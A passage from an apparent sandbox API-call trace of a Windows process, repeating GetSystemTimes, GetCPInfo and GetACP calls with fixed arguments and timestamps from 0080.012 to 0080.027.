lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.012] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.012] GetACP () returned 0x4e4 [0080.012] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.012] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.012] GetACP () returned 0x4e4 [0080.012] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.012] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.012] GetACP () returned 0x4e4 [0080.013] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.013] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.013] GetACP () returned 0x4e4 [0080.013] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.013] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.013] GetACP () returned 0x4e4 [0080.013] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.013] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.013] GetACP () returned 0x4e4 [0080.013] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.013] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.013] GetACP () returned 0x4e4 [0080.013] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.013] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.014] GetACP () returned 0x4e4 [0080.014] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.014] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.014] GetACP () returned 0x4e4 [0080.014] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.014] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.014] GetACP () returned 0x4e4 [0080.014] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.014] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.014] GetACP () returned 0x4e4 [0080.014] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.014] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.014] GetACP () returned 0x4e4 [0080.014] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.014] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.014] GetACP () returned 0x4e4 [0080.014] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.015] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.015] GetACP () returned 0x4e4 [0080.015] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.015] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.015] GetACP () returned 0x4e4 [0080.015] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.015] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.015] GetACP () returned 0x4e4 [0080.015] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.015] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.015] GetACP () returned 0x4e4 [0080.015] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.015] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.015] GetACP () returned 0x4e4 [0080.015] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.015] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.015] GetACP () returned 0x4e4 [0080.015] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.015] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.015] GetACP () returned 0x4e4 [0080.015] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.016] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.016] GetACP () returned 0x4e4 [0080.016] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.016] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.016] GetACP () returned 0x4e4 [0080.016] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.016] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.016] GetACP () returned 0x4e4 [0080.016] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.016] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.016] GetACP () returned 0x4e4 [0080.016] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.016] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.016] GetACP () returned 0x4e4 [0080.016] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.016] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.016] GetACP () returned 0x4e4 [0080.017] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.017] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.017] GetACP () returned 0x4e4 [0080.017] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.017] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.017] GetACP () returned 0x4e4 [0080.017] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.017] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.017] GetACP () returned 0x4e4 [0080.017] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.017] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.017] GetACP () returned 0x4e4 [0080.017] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.017] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.017] GetACP () returned 0x4e4 [0080.017] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.017] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.017] GetACP () returned 0x4e4 [0080.017] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.018] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.018] GetACP () returned 0x4e4 [0080.018] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.018] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.018] GetACP () returned 0x4e4 [0080.018] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.018] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.018] GetACP () returned 0x4e4 [0080.018] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.018] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.018] GetACP () returned 0x4e4 [0080.018] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.018] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.018] GetACP () returned 0x4e4 [0080.018] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.018] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.018] GetACP () returned 0x4e4 [0080.018] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.018] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.019] GetACP () returned 0x4e4 [0080.019] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.019] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.019] GetACP () returned 0x4e4 [0080.019] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.019] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.019] GetACP () returned 0x4e4 [0080.019] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.019] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.019] GetACP () returned 0x4e4 [0080.019] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.019] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.019] GetACP () returned 0x4e4 [0080.019] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.019] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.019] GetACP () returned 0x4e4 [0080.019] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.020] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.020] GetACP () returned 0x4e4 [0080.020] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.020] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.020] GetACP () returned 0x4e4 [0080.020] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.020] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.020] GetACP () returned 0x4e4 [0080.020] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.020] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.020] GetACP () returned 0x4e4 [0080.020] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.021] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.021] GetACP () returned 0x4e4 [0080.021] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.021] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.021] GetACP () returned 0x4e4 [0080.021] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.021] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.021] GetACP () returned 0x4e4 [0080.021] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.021] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.021] GetACP () returned 0x4e4 [0080.021] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.021] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.021] GetACP () returned 0x4e4 [0080.021] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.021] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.022] GetACP () returned 0x4e4 [0080.022] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.022] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.022] GetACP () returned 0x4e4 [0080.022] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.022] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.022] GetACP () returned 0x4e4 [0080.022] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.022] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.022] GetACP () returned 0x4e4 [0080.022] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.022] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.022] GetACP () returned 0x4e4 [0080.022] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.023] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.023] GetACP () returned 0x4e4 [0080.023] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.023] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.023] GetACP () returned 0x4e4 [0080.023] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.023] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.023] GetACP () returned 0x4e4 [0080.023] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.023] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.023] GetACP () returned 0x4e4 [0080.023] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.024] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.024] GetACP () returned 0x4e4 [0080.024] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.024] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.024] GetACP () returned 0x4e4 [0080.024] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.024] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.024] GetACP () returned 0x4e4 [0080.024] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.024] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.024] GetACP () returned 0x4e4 [0080.024] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.025] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.025] GetACP () returned 0x4e4 [0080.025] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.025] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.025] GetACP () returned 0x4e4 [0080.025] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.025] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.025] GetACP () returned 0x4e4 [0080.025] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.025] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.025] GetACP () returned 0x4e4 [0080.025] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.026] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.026] GetACP () returned 0x4e4 [0080.026] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.026] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.026] GetACP () returned 0x4e4 [0080.026] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.026] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.026] GetACP () returned 0x4e4 [0080.026] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.026] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.026] GetACP () returned 0x4e4 [0080.026] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0080.027] GetACP () returned 0x4e4 [0080.027] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0080.027] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 